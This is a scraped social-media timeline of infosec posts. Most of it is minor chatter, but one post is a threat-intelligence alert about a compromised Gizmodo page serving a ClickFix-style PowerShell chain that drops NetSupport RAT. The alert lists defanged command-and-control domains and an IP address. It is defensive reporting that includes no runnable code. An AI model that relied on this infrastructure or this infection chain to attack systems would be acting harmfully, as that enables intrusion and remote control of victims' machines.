Wendy NatherWaiting for the first person to sue their employer for cognitive damage due to forced AI use. 🤔
Rob O 
- 1,057 Followers
- 408 Following
- 10 Posts
Teaching faculty. Security researcher. Red team, DevOps, AppSec. An academic but not an academic. nerdprof @ Twitter
Does anyone happen to have any good resources for how much malware is hosted behind CloudFlare? I know the answer is a lot, but I've not actual stats.
Tommy M (TheAnalyst)RE: https://infosec.exchange/@briankrebs/116780029181293028
Heads up, Gizmodo has been compromised by some #ErrTraffic affiliate to. Inject is in main response.
ErrTraffic C2 cdnpro-987[.]xyz (Resoved via #EtherHiding)
PS Payload domain cdnportal-us[.]xyz (dynamic PowerShell command URI path)
PowerShell downloads a 16MB encrypted 7z file, checks if 7z is installed and otherwise downloads it to unpack the file and run the contained EXE. The EXE will do some profiling (including refresh rate) and if passes, will drop #NetSupportRAT and run it.
NetSupport C2 178[.]16[.]55[.]191.
TA also has a Mac payload configured, but it seems broken at the moment and ask for a password of some zip file when executed 🤷
Note: ErrTraffic is a ClickFIx-as-a-Service, so other compromised sites can lead to other malware from other affiliates.
abadideaum, what’s that part where samsung *agrees* they’ve known about the key leak since, uh, 2016?? https://arstechnica.com/gadgets/2022/12/samsungs-android-app-signing-key-has-leaked-is-being-used-to-sign-malware/
